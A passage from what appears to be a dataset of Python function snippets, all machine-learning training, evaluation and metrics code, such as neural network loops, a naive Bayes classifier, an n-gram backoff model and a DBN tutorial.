self.metrics\n warnings.filterwarnings('ignore','Mean of empty slice')\n\n ## load data\n trn, trn_labs = train_data\n tst, tst_labs = test_data\n\n # trn = trn.transpose(1,0)\n tst = tst.transpose(1,0)\n\n t_final = -(np.flipud(trn!=self.padding).argmax(0)+1)\n test_tfinal = -(np.flipud(tst!=self.padding).argmax(0)+1)\n\n ntest = tst.size(1)\n P = self.decoder.out_features\n\n ## training data ###########################################################\n # hidden = self.init_hidden(trn.size(1))\n # out, hidden = self.transparent_forward(trn, hidden)\n # # output = out[t_final, np.arange(trn.size(1)), :]\n # output = out.squeeze()\n # # compute orthogonality\n # mem_act = np.array([np.cumsum(trn==p,axis=0).int().detach().numpy() % 2 \\\n # for p in range(self.q_)]).transpose((1,2,0))\n\n # ps_clf = LinearDecoder(self, 2**(self.q_-1), MeanClassifier)\n # ps = []\n # for d in Dichotomies(mem_act, 'simple'):\n # np.warnings.filterwarnings('ignore',message='invalid value encountered in')\n # ps_clf.fit(hidden.detach().numpy(), d)\n # new_ps = ps_clf.orthogonality()\n # ps.append(new_ps)\n # # if new_ps > ps:\n # # ps = new_ps\n # m['train_parallelism'] = np.append(m['train_parallelism'], np.array(ps).T, axis=0)\n\n # # print(mem_act.shape)\n # # print(hidden.shape)\n # # self.orth_clf.fit(hidden.detach().numpy(), mem_act)\n # # orth_score = self.orth_clf.orthogonality()\n # # m['train_orthogonality'] = np.append(m['train_orthogonality'], orth_score)\n\n ## test data ##############################################################\n hidden = self.init_hidden(tst.size(1))\n out, hidden = self.transparent_forward(tst, hidden)\n # output = out.squeeze()\n # print(hidden.shape)\n # print(out.shape)\n # print(test_tfinal)\n output = out[test_tfinal, np.arange(tst.size(1)), :]\n # raise Exception\n\n # compute loss\n test_loss = criterion(output.squeeze(0),tst_labs.squeeze())\n\n m['test_loss'] = np.append(m['test_loss'], test_loss.item())\n\n # compute orthogonality\n # mem_act = np.array([np.cumsum(tst==p,axis=0).int().detach().numpy() % 2 \\\n # for p in range(self.q_)]).transpose((1,2,0))\n\n # # self.orth_clf.fit(hidden.detach().numpy(), mem_act)\n # # orth_score = self.orth_clf.orthogonality()\n # # m['test_orthogonality'] = np.append(m['test_orthogonality'], orth_score)\n\n # # compute parallelism\n # ps_clf = LinearDecoder(self, 2**(self.q_-1), MeanClassifier)\n # ps = []\n # for d in Dichotomies(mem_act, 'simple'):\n # np.warnings.filterwarnings('ignore',message='invalid value encountered in')\n # ps_clf.fit(hidden.detach().numpy(), d)\n # new_ps = ps_clf.orthogonality()\n # ps.append(new_ps)\n # # if new_ps > ps:\n # # ps = new_ps\n # m['test_parallelism'] = np.append(m['test_parallelism'], np.array(ps).T, axis=0)\n\n ## package #################################################################\n self.metrics = m\n warnings.filterwarnings('default')", "def _train_epoch(self, train_batches, dropout_keep_prob):\n total_num, total_loss = 0, 0\n log_every_n_batch, n_batch_loss = 50, 0\n for bitx, batch in enumerate(train_batches, 1):\n #self.check(batch)\n feed_dict = {self.p: batch['passage_token_ids'],\n self.q: batch['question_token_ids'],\n self.p_char: batch['passage_char_ids'],\n self.q_char: batch['question_char_ids'],\n self.p_length: batch['passage_length'],\n self.q_length: batch['question_length'],\n self.start_label: batch['start_id'],\n self.end_label: batch['end_id'],\n self.dropout_keep_prob: dropout_keep_prob}\n _, loss = self.sess.run([self.train_op, self.loss], feed_dict)\n total_loss += loss * len(batch['raw_data'])\n total_num += len(batch['raw_data'])\n n_batch_loss += loss\n if log_every_n_batch > 0 and bitx % log_every_n_batch == 0:\n self.logger.info('Average loss from batch {} to {} is {}'.format(\n bitx - log_every_n_batch + 1, bitx, n_batch_loss / log_every_n_batch))\n n_batch_loss = 0\n return 1.0 * total_loss / total_num", "def run_code_for_training_with_CrossEntropy_and_BCE_Losses(self, net):\n filename_for_out1 = \"performance_numbers_\" + str(self.dl_studio.epochs) + \"label.txt\"\n filename_for_out2 = \"performance_numbers_\" + str(self.dl_studio.epochs) + \"regres.txt\"\n FILE1 = open(filename_for_out1, 'w')\n FILE2 = open(filename_for_out2, 'w')\n net = copy.deepcopy(net)\n net = net.to(self.dl_studio.device)\n criterion1 = nn.CrossEntropyLoss()\n# criterion2 = self.dl_studio.DetectAndLocalize.IOULoss(self.dl_studio.batch_size)\n criterion2 = nn.BCELoss()\n optimizer = optim.SGD(net.parameters(), \n lr=self.dl_studio.learning_rate, momentum=self.dl_studio.momentum)\n for epoch in range(self.dl_studio.epochs): \n running_loss_labeling = 0.0\n running_loss_regression = 0.0 \n for i, data in enumerate(self.train_dataloader):\n gt_too_small = False\n inputs, bbox_gt, labels = data['image'], data['bbox'], data['label']\n if self.dl_studio.debug_train and i % 1000 == 999:\n print(\"\\n\\n[iter=%d:] Ground Truth: \" % (i+1) + \n ' '.join('%5s' % self.dataserver_train.class_labels[labels[j].item()] for j in range(self.dl_studio.batch_size)))\n inputs = inputs.to(self.dl_studio.device)\n labels = labels.to(self.dl_studio.device)\n bbox_gt = bbox_gt.to(self.dl_studio.device)\n optimizer.zero_grad()\n outputs = net(inputs)\n outputs_label = outputs[0]\n bbox_pred = outputs[1]\n if self.dl_studio.debug_train and i % 500 == 499:\n inputs_copy = inputs.detach().clone()\n inputs_copy = inputs_copy.cpu()\n bbox_pc = bbox_pred.detach().clone()\n bbox_pc[bbox_pc<0] = 0\n bbox_pc[bbox_pc>31] = 31\n _, predicted = torch.max(outputs_label.data, 1)\n print(\"[iter=%d:] Predicted Labels: \" % (i+1) + \n ' '.join('%10s' % self.dataserver_train.class_labels[predicted[j].item()] \n for j in range(self.dl_studio.batch_size)))\n for idx in range(self.dl_studio.batch_size):\n i1 = int(bbox_gt[idx][1])\n i2 = int(bbox_gt[idx][3])\n j1 = int(bbox_gt[idx][0])\n j2 = int(bbox_gt[idx][2])\n k1 = int(bbox_pc[idx][1])\n k2 = int(bbox_pc[idx][3])\n l1 = int(bbox_pc[idx][0])\n l2 = int(bbox_pc[idx][2])\n print(\" gt_bb: [%d,%d,%d,%d]\"%(j1,i1,j2,i2))\n print(\" pred_bb: [%d,%d,%d,%d]\"%(l1,k1,l2,k2))\n inputs_copy[idx,0,i1:i2,j1] = 255\n inputs_copy[idx,0,i1:i2,j2] = 255\n inputs_copy[idx,0,i1,j1:j2] = 255\n inputs_copy[idx,0,i2,j1:j2] = 255\n inputs_copy[idx,2,k1:k2,l1] = 255 \n inputs_copy[idx,2,k1:k2,l2] = 255\n inputs_copy[idx,2,k1,l1:l2] = 255\n inputs_copy[idx,2,k2,l1:l2] = 255\n self.dl_studio.display_tensor_as_image(\n torchvision.utils.make_grid(inputs_copy, normalize=True),\n \"see terminal for TRAINING results at iter=%d\" % (i+1))\n mask_regress = torch.zeros(self.dl_studio.batch_size,32,32,requires_grad=False)\n mask_gt = torch.zeros(self.dl_studio.batch_size, 32,32)\n for k,out_regres in enumerate(bbox_pred):\n x1,y1,x2,y2 = bbox_pred[k].tolist()\n x1_gt,y1_gt,x2_gt,y2_gt = bbox_gt[k].tolist()\n x1,y1,x2,y2 = [int(item) if item >0 else 0 for item in (x1,y1,x2,y2)]\n x1_gt,y1_gt,x2_gt,y2_gt = [int(item) if item>0 else 0 for item in (x1_gt,y1_gt,x2_gt,y2_gt)]\n if abs(x1_gt - x2_gt)<5 or abs(y1_gt-y2_gt) < 5: gt_too_small = True\n mask_regress_np = np.zeros((32,32), dtype=bool)\n mask_gt_np = np.zeros((32,32), dtype=bool)\n mask_regress_np[y1:y2,x1:x2] = 1\n mask_gt_np[y1_gt:y2_gt, x1_gt:x2_gt] = 1\n mask_regress[k,:,:] = torch.from_numpy(mask_regress_np)\n mask_regress.reqiures_grad=True\n mask_gt[k,:,:] = torch.from_numpy(mask_gt_np)\n mask_gt.reqiures_grad=True \n loss_labeling = criterion1(outputs_label, labels)\n loss_labeling.backward(retain_graph=True) \n loss_regression = criterion2(mask_regress, mask_gt)\n loss_regression.requires_grad = True\n loss_regression.backward()\n optimizer.step()\n running_loss_labeling += loss_labeling.item() \n running_loss_regression += loss_regression.item() \n if i % 1000 == 999: \n avg_loss_labeling = running_loss_labeling / float(1000)\n avg_loss_regression = running_loss_regression / float(1000)\n print(\"[epoch:%d, batch:%5d] loss_labeling: %.3f loss_regression: %.3f \" % (epoch + 1, i + 1, avg_loss_labeling, avg_loss_regression))\n FILE1.write(\"%.3f\\n\" % avg_loss_labeling)\n FILE1.flush()\n FILE2.write(\"%.3f\\n\" % avg_loss_regression)\n FILE2.flush()\n running_loss_labeling = 0.0\n running_loss_regression = 0.0\n print(\"\\nFinished Training\\n\")\n self.save_model(net)", "def _do_train_job(self, sentences, alpha, inits):\n work, neu1 = inits\n tally = 0\n if self.sg:\n if self.replication:\n logger.info('Training n2v with original code')\n tally += train_batch_sg_replication(self, sentences, alpha,\n work)\n else:\n logger.info('Training n2v with refactored code')\n tally += train_batch_sg(self, sentences, alpha, work)\n else:\n raise Exception('Nonce2Vec does not support cbow mode')\n return tally, self._raw_word_count(sentences)", "def train( self, trainingData, trainingLabels, validationData, validationLabels ):\n\n self.features = trainingData[0].keys() # could be useful later\n # DO NOT ZERO OUT YOUR WEIGHTS BEFORE STARTING TRAINING, OR\n # THE AUTOGRADER WILL LIKELY DEDUCT POINTS.\n for iteration in range(self.max_iterations):\n #pdb.set_trace() # esto es un break point para que puedas comprobar el formato de los datos\n print (\"Starting iteration \", iteration, \"...\")\n for i in range(len(trainingData)):#training data\n max = -10000000\n for j in range(len(self.weights)):\n prod = np.dot(self.weights[j], trainingData[i]) #este sería x0 (en la primera vuelta) (xj)\n if (prod > max):\n max=prod #en max guardamos la distancia a la instancia que más cerca está de la que estamos recorriendo\n indclase=j #guardas el índice de la clase a la que predices que pertenece\n\n if(indclase != trainingLabels[i]):\n # recalcular pesos\n self.weights[trainingLabels[i]].__radd__(trainingData[i]) #honek jarraian egiten du gehiketa pisu guztientzat\n #pdb.set_trace() # esto es un break point para que puedas comprobar el formato de los datos\n self.weights[indclase].__sub__(trainingData[i]) #honek jarraian egiten du kenketa pisu guztientzat\n\n\n\n\n\n ########################################################################################\n # 1. i es el indice de un ejemplo (un item, f(x) de un ejemplo) del conjunto de entrenamiento.\n # 2. Asi pues, en cada vuelta de este loop se trata un solo ejemplo\n # por cada ejemplo calculareis el producto punto (dotProduct) w*item\n # NOTAS: Recordad que cada ejemplo viene representado por varios rasgos (o features), es decir, es un vector de rasgos, tantos como nos marca el atributo self.features.\n # Asi cada ejemplo es de dimension 1 filas y self.features).\n # La dimension del vector w tambien es self.features, es decir, habra tantos pesos en w_rasgo dentro de w como rasgos haya en cada item de ejemplo\n # Recordad tambien que es una clasificacion multiclase en este caso. Hay tantas clases como nos marca el atributo self.legalLabels\n #########################################################################################", "def sgd(iterations):\n for iteration in range(0,iterations):\n error = []\n for user_id in range(0,latent_user_preferences.shape[0]):\n for item_id in range(0,latent_item_features.shape[0]):\n rating = user_ratings[user_id][item_id]\n if rating != 99:\n err = train(user_id, item_id, rating)\n error.append(err)\n mse = (np.array(error) ** 2).mean() \n if(iteration%1 == 0):#000 == 0 ):\n print(mse)\n return error", "def naiveBayes(train_set, train_labels, dev_set, smoothing_parameter, pos_prior):\n # TODO: Write your code here\n # return predicted labels of development set\n #\n ### len(train_set) 8000, len(dev) = 5000 P(pos) = 0.8 \n #### 0.55, 4.0, 0.30 ----------- 0.766\n #### 0.25 3.5 0.3 -------------- 0.766\n print(pos_prior)\n smoothing_parameter = 3.5\n pos_total_word = 0\n neg_total_word = 0\n pos_word_dict = {}\n neg_word_dict = {}\n dicts = [neg_word_dict, pos_word_dict]\n for i, sentence in enumerate(train_set):\n\n if train_labels[i] == 1: # positive reviews\n for word in sentence:\n pos_total_word += 1 \n if word in stop_words:\n continue\n if word in pos_word_dict:\n pos_word_dict[word] += 1\n else :\n pos_word_dict[word] = 1\n\n else: # negative reviews\n for word in sentence:\n neg_total_word += 1 \n if word in stop_words:\n continue\n if word in neg_word_dict:\n neg_word_dict[word] += 1\n else :\n neg_word_dict[word] = 1\n\n\n prob = {}\n denominator_pos = pos_total_word + smoothing_parameter * (len(pos_word_dict) + 1)\n denominator_neg = neg_total_word + smoothing_parameter * (len(neg_word_dict) + 1)\n de = [denominator_neg, denominator_pos]\n\n for t, dictionary in enumerate(dicts):\n for key, value in dictionary.items():\n if key not in prob:\n prob[key] = {0 : 0, 1 : 0}\n if smoothing_parameter != 0:\n prob[key][1 - t] = -1 * np.log(smoothing_parameter / de[t]) \n # print(prob[key][1 - t])\n\n prob[key][t] = -1 * np.log((value + smoothing_parameter) / de[t]) \n \n\n revised_prob = {}\n for key, value in prob.items():\n if np.abs(value[0] - value[1]) >= 0.25:\n revised_prob[key] = value \n\n print(len(revised_prob))\n\n dev_labels = []\n num_0 = 0\n for i, sentence in enumerate(dev_set):\n pos_odd = -1 * np.log(pos_prior)\n neg_odd = -1 * np.log(1.0 - pos_prior)\n for word in sentence:\n if word in revised_prob:\n pos_odd += revised_prob[word][1]\n neg_odd += revised_prob[word][0]\n \n if pos_odd > neg_odd:\n num_0 += 1\n dev_labels.append(1 if pos_odd <= neg_odd else 0)\n print(num_0)\n\n \n #### bigram model \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n return dev_labels", "def finetune_n_estimators_createData():\n acc, auc = [], []\n for i in tqdm([j*10 for j in range(1,31)],desc='Progress(n_estimators)',ncols=70,smoothing=0.5):\n X_train, X_test, y_train, y_test, X, y_binary = initializing()\n XGBCla = get_XGBmodel(n_est=i)\n XGBCla = XGBCla.fit(X_train, y_train)\n acc.append(accuracy_score(XGBCla.predict(X_test),y_test))\n auc.append(roc_auc_score(XGBCla.predict(X_test),y_test))\n np.save(\"npy-data/result_n_estimators_tuning_acc_auc_crossval_train\",acc+auc)", "def calculate_batch_metrics(self):\n pass", "def test_compute_metrics(self):\n with self.test_session() as sess:\n tf.set_random_seed(1234)\n dut = _setup_trainer(self.tmpdir)\n\n sess.run(tf.global_variables_initializer())\n sess.run((dut.train_iterator.initializer,\n dut.train_metric_reset_op))\n\n train_mloss = sess.run(dut.train_mean_loss)\n\n # Without update, it should be zero.\n self.assertEqual(train_mloss, 0.)\n\n sess.run((dut.train_op, dut.train_mean_loss_update_op))\n\n train_mloss = sess.run(dut.train_mean_loss)\n\n # After update.\n self.assertAlmostEqual(train_mloss, 5.2298584)", "def __init__(self, n, sents, corpus='', beta=None, addone=True):\n self.n = n\n self.beta = beta\n self.corpus = corpus\n self.beta_flag = True\n self.addone = addone\n self.smoothingtechnique = 'Back Off (Katz) with Discounting Smoothing'\n self.counts = counts = defaultdict(int)\n self.A_set = defaultdict(set)\n voc = ['</s>']\n for s in sents:\n voc += s\n self.voc = set(voc)\n if beta is None:\n self.beta_flag = False\n\n # if no beta given, we compute it\n if not self.beta_flag:\n total_sents = len(sents)\n aux = int(total_sents * 90 / 100)\n # 90 per cent por training\n train_sents = sents[:aux]\n # 10 per cent for perplexity (held out data)\n held_out_sents = sents[-total_sents+aux:]\n\n train_sents = list(map((lambda x: ['<s>']*(n-1) + x), train_sents))\n train_sents = list(map((lambda x: x + ['</s>']), train_sents))\n for sent in train_sents:\n for j in range(n+1):\n for i in range(n-j, len(sent) - j + 1):\n ngram = tuple(sent[i: i + j])\n counts[ngram] += 1\n # for efficiency, we save the A set as a dict of sets\n if j:\n self.A_set[ngram[:-1]].add(ngram[-1])\n for i in range(1, n):\n counts[('<s>',)*i] += len(train_sents)\n counts[('</s>',)] = len(train_sents)\n\n self.tocounts = counts\n # search for the beta that gives lower perplexity\n beta_candidates = [i*0.1 for i in range(1, 10)]\n # xs is a list with (beta, perplexity)\n xs = []\n self.sents = train_sents\n for aux_beta in beta_candidates:\n self.beta = aux_beta\n aux_perx = self.perplexity(held_out_sents)\n xs.append((aux_beta, aux_perx))\n xs.sort(key=lambda x: x[1])\n self.beta = xs[0][0]\n with open('old-stuff/backoff_'+str(n)+'_parameters_'+corpus, 'a') as f:\n f.write('Order: {}\\n'.format(self.n))\n f.write('Beta: {}\\n'.format(self.beta))\n f.write('AddOne: {}\\n'.format(self.addone))\n f.write('Perplexity observed: {}\\n'.format(xs[0][1]))\n f.write('-------------------------------\\n')\n f.close()\n else:\n sents = list(map((lambda x: x + ['</s>']), sents))\n sents = list(map((lambda x: ['<s>']*(n-1) + x), sents))\n\n for sent in sents:\n for j in range(n+1):\n for i in range(n-j, len(sent) - j + 1):\n ngram = tuple(sent[i: i + j])\n counts[ngram] += 1\n # for efficiency, we save the A set as a dict of sets\n if j:\n self.A_set[ngram[:-1]].add(ngram[-1])\n for i in range(1, n):\n counts[('<s>',)*i] += len(sents)\n counts[('</s>',)] = len(sents)", "def test_DBN(finetune_lr=0.1, pretraining_epochs=100,\n pretrain_lr=0.01, k=1, training_epochs=1000,\n dataset='mnist.pkl.gz', batch_size=10):\n\n datasets = load_data(dataset)\n\n train_set_x, train_set_y = datasets[0]\n valid_set_x, valid_set_y = datasets[1]\n test_set_x, test_set_y = datasets[2]\n\n # compute number of minibatches for training, validation and testing\n n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size\n\n # numpy random generator\n numpy_rng = numpy.random.RandomState(123)\n print('... building the model')\n # construct the Deep Belief Network\n dbn = DBN(numpy_rng=numpy_rng, n_ins=28 * 28,\n hidden_layers_sizes=[1000, 1000, 1000],\n n_outs=10)\n\n # start-snippet-2\n #########################\n # PRETRAINING THE MODEL #\n #########################\n print('... getting the pretraining functions')\n pretraining_fns = dbn.pretraining_functions(train_set_x=train_set_x,\n batch_size=batch_size,\n k=k)\n\n print('... pre-training the model')\n start_time = timeit.default_timer()\n ## Pre-train layer-wise\n for i in range(dbn.n_layers):\n # go through pretraining epochs\n for epoch in range(pretraining_epochs):\n # go through the training set\n c = []\n for batch_index in range(int(n_train_batches)):\n c.append(pretraining_fns[i](index=batch_index,\n lr=pretrain_lr))\n print('Pre-training layer %i, epoch %d, cost ' % (i, epoch), end=' ')\n print(numpy.mean(c))\n\n end_time = timeit.default_timer()\n # end-snippet-2\n print(('The pretraining code for file ' +\n os.path.split(__file__)[1] +\n ' ran for %.2fm' % ((end_time - start_time) / 60.)), file=sys.stderr)\n ########################\n # FINETUNING THE MODEL #\n ########################\n\n # get the training, validation and testing function for the model\n print('... getting the finetuning functions')\n train_fn, validate_model, test_model = dbn.build_finetune_functions(\n datasets=datasets,\n batch_size=batch_size,\n learning_rate=finetune_lr\n )\n\n print('... finetuning the model')\n # early-stopping parameters\n patience = 4 * n_train_batches # look as this many examples regardless\n patience_increase = 2. # wait this much longer when a new best is\n # found\n improvement_threshold = 0.995 # a relative improvement of this much is\n # considered significant\n validation_frequency = min(n_train_batches, patience / 2)\n # go through this many\n # minibatches before checking the network\n # on the validation set; in this case we\n # check every epoch\n\n best_validation_loss = numpy.inf\n test_score = 0.\n start_time = timeit.default_timer()\n\n done_looping = False\n epoch = 0\n\n while (epoch < training_epochs) and (not done_looping):\n epoch = epoch + 1\n for minibatch_index in range(int(n_train_batches)):\n\n minibatch_avg_cost = train_fn(minibatch_index)\n iter = (epoch - 1) * n_train_batches + minibatch_index\n\n if (iter + 1) % validation_frequency == 0:\n\n validation_losses = validate_model()\n this_validation_loss = numpy.mean(validation_losses)\n print((\n 'epoch %i, minibatch %i/%i, validation error %f %%'\n % (\n epoch,\n minibatch_index + 1,\n n_train_batches,\n this_validation_loss * 100.\n )\n ))\n\n # if we got the best validation score until now\n if this_validation_loss < best_validation_loss:\n\n #improve patience if loss improvement is good enough\n if (\n this_validation_loss < best_validation_loss *\n improvement_threshold\n ):\n patience = max(patience, iter * patience_increase)\n\n # save best validation score and iteration number\n best_validation_loss = this_validation_loss\n best_iter = iter\n\n # test it on the test set\n test_losses = test_model()\n test_score = numpy.mean(test_losses)\n print(((' epoch %i, minibatch %i/%i, test error of '\n 'best model %f %%') %\n (epoch, minibatch_index + 1, n_train_batches,\n test_score * 100.)))\n\n if patience <= iter:\n done_looping = True\n break\n\n end_time = timeit.default_timer()\n print((\n (\n 'Optimization complete with best validation score of %f %%, '\n 'obtained at iteration %i, '\n 'with test performance %f %%'\n ) % (best_validation_loss * 100., best_iter + 1, test_score * 100.)\n ))\n print(('The fine tuning code for file ' +\n os.path.split(__file__)[1] +\n ' ran for %.2fm' % ((end_time - start_time)\n / 60.)), file=sys.stderr)", "def get_nml_probs(x, model, data=None, normalize=True, num_classes=2, query_point_weight=20, dist_weight_thresh=None, \n num_grad_steps=10, lr=0.01, batch_size=32, grad_penalty=None, verbose=False, \n show_plots=False, plotting_2d=False, return_params=False):\n results = []\n data = data or DEFAULT_DATA\n orig_inputs, orig_targets = data\n \n if show_plots and plotting_2d:\n plt.figure()\n plt.title(f\"Original rewards\")\n plot_rewards(model, contours=True)\n plot_dataset(data)\n \n marker_for_class = {\n 0: 'x',\n 1: '*'\n }\n \n model.cuda()\n num_batches = ceil(len(orig_inputs) / batch_size)\n\n # NOTE train on gpu, move back to cpu for eval\n \n for proposed_class in range(num_classes):\n new_model = copy.deepcopy(model)\n new_model.cuda()\n \n # Sample all of the adaptation batches in advance\n optimizer = optim.SGD(new_model.parameters(), lr=lr)\n \n for _ in range(num_grad_steps):\n idxs = np.random.permutation(range(len(orig_inputs)))[:batch_size-1]\n X, y = orig_inputs[idxs], orig_targets[idxs]\n X = torch.Tensor(np.vstack((X, x))).cuda()\n y = torch.Tensor(np.hstack((y, proposed_class))).long().cuda()\n \n logits = new_model(X)\n loss = F.cross_entropy(logits, y, reduction='none')\n \n if dist_weight_thresh:\n weights = np.exp(-np.linalg.norm(x - X.cpu().numpy(), axis=-1) * 2.3 / dist_weight_thresh)\n else:\n weights = np.ones(len(y))\n \n weights[-1] *= query_point_weight * 1. / num_batches\n weights = torch.Tensor(weights).cuda()\n loss = torch.sum(loss * weights) / torch.sum(weights)\n \n loss.backward()\n optimizer.step()\n \n new_model.cpu()\n \n with torch.no_grad():\n x_tensor = torch.Tensor(x[None])\n probs = torch.softmax(new_model(x_tensor), -1)\n results.append(probs[0][proposed_class].item())\n \n if show_plots:\n new_model.to(torch.device(\"cpu\"))\n\n if plotting_2d: \n plt.figure()\n plot_rewards(new_model, contours=True, env = False, title=f\"Finetuning on label {proposed_class}\")\n plot_dataset(data)\n plt.scatter(x[0], x[1], marker=marker_for_class[proposed_class], color='w', s=100)\n \n plt.figure()\n plt.title(f\"Losses for label {proposed_class}\")\n plt.plot(losses)\n \n plt.figure()\n plt.title(f\"x loss for label {proposed_class}\")\n plt.plot(x_losses)\n \n plt.figure()\n plt.title(f\"x probs for label {proposed_class}\")\n plt.plot(x_vals)\n \n model.cpu()\n \n if normalize:\n results = np.array(results) / sum(results)\n else:\n results = np.array(results)\n return results if not return_params else (results, new_model)", "def _optimise(self, n_batches: int) -> float:\n all_batches_iter = self._make_batches(n_batches)\n tr = tqdm.tqdm(all_batches_iter, desc='batch', total=n_batches)\n losses = []\n part_names, part_ops = zip(*self.loss_part_ops)\n part_ops = list(part_ops)\n for batch_num, feed_dict in enumerate(tr):\n if (self.batches_seen % 50) == 0:\n run_result = self.sess.run(\n [self.op_loss, self.op_train, self.op_summary] + part_ops,\n feed_dict=feed_dict)\n loss, _, summ = run_result[:3]\n part_losses = run_result[3:]\n self.summary_writer.add_summary(summ, self.batches_seen)\n else:\n run_result = self.sess.run(\n [self.op_loss, self.op_train] + part_ops,\n feed_dict=feed_dict)\n loss = run_result[0]\n part_losses = run_result[2:]\n tr.set_postfix(loss=loss)\n losses.append(loss)\n self.batches_seen += 1\n self._log_op_value('train-loss', loss)\n assert len(part_names) == len(part_losses)\n for part_loss_name, part_loss in zip(part_names, part_losses):\n self._log_op_value('loss-%s' % part_loss_name, part_loss)\n return np.mean(losses)", "def trainUsingNNOnPenDigitData(actualData, labels, testData, testLabels):\n # Initialize variables\n epoch = 40\n eta = 0.01\n inputNeurons = actualData.shape[1]\n hiddenNeurons = 10\n outputNeurons = 4\n\n # Initialize weights and bias of hidden layer and output layer\n weightsHidden = np.random.uniform(-1, 0.99, size=(inputNeurons+1, hiddenNeurons))\n weightsOutput = np.random.uniform(-1, 0.99, size=(hiddenNeurons+1, outputNeurons))\n\n biasInput = np.ones((actualData.shape[0], 1))\n actualData = np.append(actualData, biasInput, axis=1)\n biasTest = np.ones((testData.shape[0], 1))\n testData = np.append(testData, biasTest, axis=1)\n\n # Outer loop for all the Epochs\n for i in range(epoch):\n print(\"Epoch: \", i)\n for index, row in enumerate(actualData):\n\n # Forward Propogation\n hiddenInputs = np.dot(row, weightsHidden)\n # hiddenActivation = nn.sigmoid(hiddenInputs)\n hiddenActivation = nn.sigmoid(hiddenInputs)\n hiddenActivation = np.append(hiddenActivation, [1], axis=0)\n outputInputs = np.dot(hiddenActivation, weightsOutput)\n sMaxOutput = nn.softMax(outputInputs)\n\n # Calculating stuff for backpropogation\n crossEntropyError = nn.calculateError(sMaxOutput, labels[index])\n\n # BackPropogation from Output to Hidden Layer\n derCrossEntropyErrors = nn.calculateDerCrossEntropy(sMaxOutput, labels[index])\n derSoftMaxOutputs = nn.calculateDerSoftMax(outputInputs)\n derOutputWeights = hiddenActivation\n updateWeightsOutput = np.matmul(derOutputWeights.reshape(hiddenNeurons+1, 1),\n np.transpose(derCrossEntropyErrors * derSoftMaxOutputs).reshape(1, 4))\n\n # BackPropogation from Hidden to Input Layer\n derTotalError = np.array([])\n temp1 = derCrossEntropyErrors * derSoftMaxOutputs\n\n for p, eachWeight in enumerate(weightsOutput):\n derTotalError = np.append(derTotalError, np.dot(np.transpose(temp1), eachWeight))\n\n derTotalError = derTotalError[:-1]\n derSigmoidHiddenInputs = nn.derivativeSigmoid(hiddenInputs)\n temp2 = derTotalError * derSigmoidHiddenInputs\n\n replicatedInput = nn.replicateRow(row, hiddenNeurons)\n\n updateWeightsInput = np.zeros(weightsHidden.shape)\n for p, eachRow in enumerate(np.transpose(replicatedInput)):\n updateWeightsInput[p] = temp2 * eachRow\n\n weightsOutput = weightsOutput - eta * updateWeightsOutput\n weightsHidden = weightsHidden - eta * updateWeightsInput\n\n correct = 0\n for j, r in enumerate(testData):\n # Forward Propogation\n hiddenInputs = np.dot(r, weightsHidden)\n # hiddenActivation = nn.sigmoid(hiddenInputs)\n hiddenActivation = nn.tanh(hiddenInputs)\n hiddenActivation = np.append(hiddenActivation, [1], axis=0)\n outputInputs = np.dot(hiddenActivation, weightsOutput)\n\n # Calculating stuff for backpropogation\n sMaxOutput = nn.softMax(outputInputs)\n predictedLabel = np.argmax(sMaxOutput) + 1\n if predictedLabel == (np.argmax(testLabels[j]) + 1):\n correct += 1\n\n print(\"Correct \", correct)\n print(\"Total \", testData.shape[0])\n accuracy = float(correct) / testData.shape[0]\n print(\"Accuracy: \", accuracy)", "def nb_norm(x_train, y_train, x_test):\n\n def pr(x, y_i, y):\n p = x[y == y_i].sum(0)\n return (p + 1) / ((y == y_i).sum() + 1)\n\n r = np.log(pr(x_train, 1, y_train) / pr(x_train, 0, y_train))\n r = sp.csr_matrix(r)\n x_train = x_train.multiply(r)\n x_test = x_test.multiply(r)\n\n return x_train, x_test", "def epoch_iter(model, data, optimizer, epoch):\n total_bpd = 0.0\n for i, (inputs, _targets) in enumerate(data):\n log_px = model.forward(inputs)\n loss = -log_px.mean()\n\n if model.training:\n # update gradients\n model.zero_grad()\n loss.backward()\n optimizer.step()\n\n # per dimension\n bpd = loss.item() / (x_dim * np.log(2))\n print({'epoch': epoch, 'i':i, 'loss':loss.item(), 'bpd':bpd})\n total_bpd += bpd\n\n avg_bpd = total_bpd / len(data)\n return avg_bpd", "def train(net):\n\n # Set SGD hyperparameters\n n_iter = 200 # number of iterations of SGD\n learning_rate = 1e-3 # learning rate for SGD\n momentum = .99 # momentum parameter for SGD\n batch_size = 100 # number of data points in each mini-batch\n\n # Initialize binary cross-entropy loss function\n loss_fn = nn.BCELoss()\n\n # Initialize SGD optimizer with momentum\n optimizer = optim.SGD(net.parameters(), lr=learning_rate, momentum=momentum)\n\n # Placeholder to save loss at each iteration\n track_loss = []\n\n # Loop over iterations\n for i in range(n_iter):\n\n # Sample minibatch of oriented grating stimuli\n stimuli, tilt = sample_stimuli(batch_size)\n\n # Evaluate loss and update network weights\n out = net(stimuli) # predicted probability of tilt right\n loss = loss_fn(out, tilt) # evaluate loss\n optimizer.zero_grad() # clear gradients\n loss.backward() # compute gradients\n optimizer.step() # update weights\n \n # Keep track of loss at each iteration\n track_loss.append(loss.item())\n\n # Track progress\n if (i + 1) % (n_iter / 10) == 0:\n print('iteration %i | loss: %.3f | percent correct: %.2f%%' % (i + 1, loss.item(), 100 * pcorrect(out, tilt)))\n \n # Plot loss\n plt.plot(track_loss)\n plt.xlabel('iterations of SGD')\n plt.ylabel('binary cross-entropy loss')\n plt.xlim([0, None])\n plt.ylim([0, None])\n plt.show()", "def generateStats(self):\n\t\tn = float(self.n)\n\t\tm = float(self.m)\n\t\tk = float(self.k)\n\t\tp_fp = math.pow(1.0 - math.exp(-(k*n)/m), k)\n\t\tprint \"Probability of false positives: \", p_fp\n\t\tprint \"Predicted false positive rate: \", p_fp * 100.0\n\t\tprint \"Number of elements entered in filter: \", n\n\t\tprint \"Number of bits in filter: \", m\n\t\tprint \"Number of hashes in filter: \", k", "def __init__(\n self,\n hidden_dims,\n input_dim=3 * 32 * 32,\n num_classes=10,\n dropout=1,\n normalization=None,\n reg=0.0,\n weight_scale=1e-2,\n dtype=np.float32,\n seed=None,\n ):\n self.normalization = normalization\n self.use_dropout = dropout != 1\n self.reg = reg\n self.num_layers = 1 + len(hidden_dims)\n self.dtype = dtype\n self.params = {}\n\n Din, Dout = input_dim, hidden_dims[0]\n for i in range(self.num_layers):\n self.params['W' + str(i+1)] = np.random.normal(scale=weight_scale, size=(Din, Dout))\n self.params['b' + str(i+1)] = 